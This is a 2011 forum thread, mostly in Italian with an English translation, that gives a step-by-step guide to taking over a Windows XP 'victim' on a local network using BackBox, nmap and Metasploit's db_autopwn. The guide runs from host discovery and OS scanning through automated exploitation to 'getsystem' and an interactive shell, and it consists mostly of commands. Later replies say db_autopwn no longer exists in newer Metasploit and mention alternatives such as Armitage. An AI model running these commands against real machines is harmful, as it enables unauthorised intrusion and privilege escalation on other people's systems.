Owning Windows XP with Backbox

Started by C4tl3ash, March 24, 2011, 08:09:48 PM

Previous topic - Next topic

C4tl3ash

Owning Windows XP with BackBox


Link Video: http://www.youtube.com/watch?v=hZQ8HpF2Pho
guida relativamente semplice , usando il modulo autopwn di metasploit ^^

Tool usati:

  • Metasploit 3 ( incluso in Backbox )
  • NMap ( Incluso in BackBox )
  • Modulo AutoPwn ( incluso in Metasploit 3 )
  • Postgresql ( o un altro db ^^ )

Elenco comandi:

sudo /etc/init.d/postgresql-8.4 start
nmap -sP -T4 192.168.1.1-255
sudo msfconsole
db_driver postgresql
db_connect nomeutentepostgres:"password"@localhost/msf
db_nmap -sS -sV -T4 -O 192.168.1.235
db_autopwn -x -e -p -R great
sessions -i 1
getsystem
shell


Note teoriche:
Non credo servano :3

Spiegazione:
Allora per prima cosa dobbiamo avviare il Database Postgres, con il comando:
sudo /etc/init.d/postgresql-8.* start
successivamente troviamo l'indirizzo ip della vittima tramite il potente PortScanner NMap,
diamo quindi:
nmap -sP -T4 192.168.1.1-255

    * -sP: Aumenta la velocità, poichè non esegue portscanning ma rileva solamente se l'host è Up  tramite ping :)
    * -T4: Livello di velocità, che varia da -T1 ( Paranoid ) a -T5 ( Insane ), di solito questo valore non varia molto poichè le modalità < -T3 vengono usate principalmente per i sistemi anti intrusione ecc...
    * 1-255: Esegue lo scan su un range di indirizzi che va da 192.168.1.1 a 192.168.1.255


una volta trovato l'indirizzo che nel mio caso era 192.168.1.235 copiamolo ed apriamo msfconsole,
digitiamo:

db_driver postgresql


successivamente creiamo il nostro database:

db_connect nomeutentepostgres:"password"@localhost/msf

una volta finito eseguiamo il modulo nmap dando:

db_nmap -sS -sV -T4 -O 192.168.1.235

i risultati vengono automaticamente salvati all'interno del db, quindi una volta finito diamo:

db_autopwn -x -e -p -R great

    * -R great: serve per selezionare solo gli exploit che hanno grandi possibilità di riuscire :)

ed non appena finisce, vediamo le sessioni create con

sessions -l

e selezioniamo di interagire con una tramite:

sessions -i ID


c4tl3ash~

trenatos

Any chance getting this translated into English? I think more people would have use for it, if it was available in multiple languages.

vincenzo

#2
Link Video: http://www.youtube.com/watch?v=hZQ8HpF2Pho
This is a relatively simple guide based upon the Metasploit Autopwn module.

Tools Involved:

  • Metasploit 3 ( included in Backbox )
  • NMap ( included in BackBox )
  • AutoPwn module ( included in Metasploit 3 )
  • Postgresql ( or another db )

Commands to be Issued:

sudo /etc/init.d/postgresql-8.4 start
nmap -sP -T4 192.168.1.1-255
sudo msfconsole
db_driver postgresql
db_connect postgres_username:"password"@localhost/msf
db_nmap -sS -sV -T4 -O 192.168.1.235
db_autopwn -x -e -p -R great
sessions -i 1
getsystem
shell


Theory:
Not needed.

Explanation:
First, you'll need to start the Postgres Database related service by issuing the following command:

sudo /etc/init.d/postgresql-8.* start


then, seek a victim target IP through the powerful port-scanning tool NMap:

nmap -sP -T4 192.168.1.1-255



  • -sP: increases the scanning speed as it doesn't actually make any port-scanning,
    it just detects whether a host  is up or not, through a simple ping.
  • -T4: speed level, it ranges from -T1 (Paranoid) to -T5 (Insane). This value doesn't vary that much since the values < -T3
    are mainly employed in anti-intrusion systems etc...
  • 1-255: scans IP addresses over the range between 192.168.1.1 and 192.168.1.255

Once you get the IP (192.168.1.235 in my example), copy it and start a msfconsole session. Then, type:
db_driver postgresql

Next, create your database:

db_connect postgres_username:"password"@localhost/msf


after that, execute the nmap module:

db_nmap -sS -sV -T4 -O 192.168.1.235


results will be automatically saved in your db. Then, give the following command:
db_autopwn -x -e -p -R great


  • -R great: filters the only exploits with better chances to succeed :)

Check out the created sessions with:

sessions -l


Finally, select one of them:
sessions -i ID

You cannot teach a man anything. You can only help him discover it within himself.



trenatos


Vlad

Nel tentare questo exploit mi sono inceppato su una cosa che magari per molti è stupida, ma non per me siccome sono alle prime armi :). Mi chiedevo se qualcuno mi potesse dire come mai quando arrivo a dover usare il comando "db_autopwn" mi da il seguente errore:

[-] Unknown command: db_autopwn.




While attempting to use this exploit I got stuck with something that many of you would consider as stupid, but not for me because I'm quite a newbie in this field :). I was wondering if any of you could explain me why do I get the following error when I use "db_autopwn":

[-] Unknown command: db_autopwn.

raffaele

ciao vlad, sembra che nelle nuove versioni di metasploit "db_autopwn" non sia più supportato...
raffaele@backbox:~$ Get root or die tryin'

SYSTEM_OVERIDE

Quote from: raffaele on December 01, 2011, 11:30:07 AM
ciao vlad, sembra che nelle nuove versioni di metasploit "db_autopwn" non sia più supportato...

Confermo .

Vlad


Escalion

I found this fork with autopwn still enabled. Maybe it might be an idea to use this fork optionally in backbox?

dravok

con l attacco database effettua tutte le prove.. ma non fa lo stesso anche Hail Mary?

berghem

Non ho molta esperienza, ma penso che autopwn sia ampiamente sostituito da armitage, ho sbaglio?